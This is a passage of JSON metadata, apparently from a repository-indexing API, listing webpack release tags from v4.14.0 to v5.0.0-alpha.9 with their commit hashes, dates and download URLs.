l,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9/manifests"},{"name":"v4.29.0","sha":"25bccd4c487a5bf743efc62947d81a8eaa81a90f","kind":"tag","published_at":"2019-01-20T17:38:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0/manifests"},{"name":"v5.0.0-alpha.8","sha":"adff7f61a2595ea9a04c0f3070add21be01607fb","kind":"tag","published_at":"2019-01-19T19:24:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8/manifests"},{"name":"v5.0.0-alpha.7","sha":"18aca2fcb148d04ba3d0b37742f50534d42a7ec3","kind":"tag","published_at":"2019-01-19T12:11:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7/manifests"},{"name":"v5.0.0-alpha.6","sha":"4be6797700753a54b223600f01e941580b6a6ba3","kind":"tag","published_at":"2019-01-15T16:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6/manifests"},{"name":"v4.28.4","sha":"fdb6b139b94273e5b18870262c193a93f65132e8","kind":"tag","published_at":"2019-01-10T15:48:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4/manifests"},{"name":"v5.0.0-alpha.5","sha":"0d9ed482bc39fb23040ffd26823e0b7ed73320cb","kind":"tag","published_at":"2019-01-09T14:20:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5/manifests"},{"name":"v5.0.0-alpha.4","sha":"b97bc4bc062cd5395de8b00115519472645d57d0","kind":"tag","published_at":"2019-01-08T14:09:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4/manifests"},{"name":"v5.0.0-alpha.3","sha":"762155dc2da6795dfe72a5cbeb632fc42c9c49e0","kind":"tag","published_at":"2018-12-29T17:13:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3/manifests"},{"name":"v4.28.3","sha":"983c2616ec1b869bfb659b6331bd2fe2abc66e23","kind":"tag","published_at":"2018-12-29T11:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3/manifests"},{"name":"v5.0.0-alpha.2","sha":"88f0e18e64c7935723348de3b7dd1aa92050999c","kind":"tag","published_at":"2018-12-26T10:33:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2/manifests"},{"name":"v5.0.0-alpha.1","sha":"90a0866efcd35401353c9e8d5c904fe2cd407f7e","kind":"tag","published_at":"2018-12-23T20:24:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1/manifests"},{"name":"v4.28.2","sha":"fe514dd975f1d2dd1546906a6f4c0a6b2a0e3761","kind":"tag","published_at":"2018-12-22T12:53:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2/manifests"},{"name":"v5.0.0-alpha.0","sha":"3f068c38610a1edfd6be2adf53a2dea44525cfde","kind":"tag","published_at":"2018-12-21T14:17:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0/manifests"},{"name":"v4.28.1","sha":"7a6a71f1e9349f86833de12a673805621f0fc6f6","kind":"tag","published_at":"2018-12-20T17:10:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1/manifests"},{"name":"v4.28.0","sha":"e871eeb121a69efd6cbfa56f977d5843bf030202","kind":"tag","published_at":"2018-12-19T10:37:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0/manifests"},{"name":"v4.27.1","sha":"4056506488c1e071dfc9a0127daa61bf531170bf","kind":"tag","published_at":"2018-12-05T19:13:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1/manifests"},{"name":"v4.27.0","sha":"f47bf8b64f9698cb05eff62832a04267823039cf","kind":"tag","published_at":"2018-12-04T09:31:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0/manifests"},{"name":"v4.26.1","sha":"8e841feda3ef32c64df1a175d0d9f71e47cfbe8e","kind":"tag","published_at":"2018-11-25T20:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1/manifests"},{"name":"v4.26.0","sha":"04f90c53eeae4817a9c515a0daca119d0decfa45","kind":"tag","published_at":"2018-11-19T08:39:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0/manifests"},{"name":"v4.25.1","sha":"2361995a429794d372d61e3fb628dea3929e0ca4","kind":"tag","published_at":"2018-11-05T18:12:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1/manifests"},{"name":"v4.25.0","sha":"290094e10a990aa3fd8073b02b4dc57781f924d7","kind":"tag","published_at":"2018-11-05T08:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0/manifests"},{"name":"v4.24.0","sha":"9e397b5664dab3af0ceb2fa93cb5c539f02c023c","kind":"tag","published_at":"2018-11-02T12:11:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0/manifests"},{"name":"v4.23.1","sha":"607cf70eddd213a690585276f7124963536781e7","kind":"tag","published_at":"2018-10-25T08:26:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1/manifests"},{"name":"v4.23.0","sha":"a4feb6e15ff7ac19bab1a458de369a887dde44fe","kind":"tag","published_at":"2018-10-24T15:45:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0/manifests"},{"name":"v4.22.0","sha":"894eca20bd678ca5473cfca28f332a7322c64b8e","kind":"tag","published_at":"2018-10-21T09:34:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0/manifests"},{"name":"v4.21.0","sha":"432d2a3f174b08d5f4f7de018799c97a18efa1fd","kind":"tag","published_at":"2018-10-17T17:47:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0/manifests"},{"name":"v4.20.2","sha":"5c5e902c8e89afeb51ad130f12a908b89d627fc5","kind":"tag","published_at":"2018-09-25T20:31:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2/manifests"},{"name":"v4.20.1","sha":"91e9dd77062797e3e716485f295d32a5cab57042","kind":"tag","published_at":"2018-09-25T13:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1/manifests"},{"name":"v4.20.0","sha":"c4d8a3c8d67239f6457fd7560d9bea14524ff4f0","kind":"tag","published_at":"2018-09-25T07:15:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0/manifests"},{"name":"v4.19.1","sha":"b7121c15e1cc810ead6aa0f4b2aad4666c072257","kind":"tag","published_at":"2018-09-18T07:56:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1/manifests"},{"name":"v4.19.0","sha":"6bf832398c3905e06300596caddb073c583d94c4","kind":"tag","published_at":"2018-09-13T22:04:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0/manifests"},{"name":"v4.18.1","sha":"c51a1bab94e4ff8ffca443e4fcb038bc4911e65e","kind":"tag","published_at":"2018-09-13T10:22:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1/manifests"},{"name":"v4.18.0","sha":"ee7d9485fa30d1d3d5adbfdfb52c8f57ae8b439e","kind":"tag","published_at":"2018-09-10T15:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0/manifests"},{"name":"v4.17.3","sha":"ee27d36e7cb0bed3ca32911165bbf01fef993e48","kind":"tag","published_at":"2018-09-10T14:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3/manifests"},{"name":"v4.17.2","sha":"dfe6379052598a00f13bfa4f34ac73856ddf3dd0","kind":"tag","published_at":"2018-09-03T17:25:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2/manifests"},{"name":"v4.17.1","sha":"ff3ef5eb284ddcd3da8c3f5bef6318e873779ffe","kind":"tag","published_at":"2018-08-22T09:50:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1/manifests"},{"name":"v4.17.0","sha":"6f1f18f84dee330ec582d4e9c075c47c9a732102","kind":"tag","published_at":"2018-08-21T08:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0/manifests"},{"name":"v4.16.5","sha":"025338cc91a867768325120d325b341bdcdc4321","kind":"tag","published_at":"2018-08-06T07:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5/manifests"},{"name":"v4.16.4","sha":"1e9d98cb4e52a6efc58f516aa7451d1faa6347ba","kind":"tag","published_at":"2018-08-02T13:46:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4/manifests"},{"name":"v4.16.3","sha":"482ff200303e84a65bdd5c456ce232309a6ce450","kind":"tag","published_at":"2018-07-27T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3/manifests"},{"name":"v4.16.2","sha":"0d4c87fcf261de02a6ecfb05faab235c5a2a92dc","kind":"tag","published_at":"2018-07-23T09:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2/manifests"},{"name":"v4.16.1","sha":"fa02f3d03344913f0a02d29cb363581bc8535bef","kind":"tag","published_at":"2018-07-16T08:27:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1/manifests"},{"name":"v4.16.0","sha":"18d33c630f799e99e5e43fc0b6931713dc976529","kind":"tag","published_at":"2018-07-11T08:45:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0/manifests"},{"name":"v4.15.1","sha":"81149be5c1cd2a3ce70c3abcc179c5070fd6dd1c","kind":"tag","published_at":"2018-07-05T13:32:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1/manifests"},{"name":"v4.15.0","sha":"bdd4442c449b41d2a0ea7ed0de9cded3ba0e2e31","kind":"tag","published_at":"2018-07-04T19:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0/manifests"},{"name":"v4.14.0","sha":"190cf7b017c9d4106c83553a1de652e53452b095","kind":"tag","published_at":"2018-06-29T12:12:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0","manifests_url":"https://repos.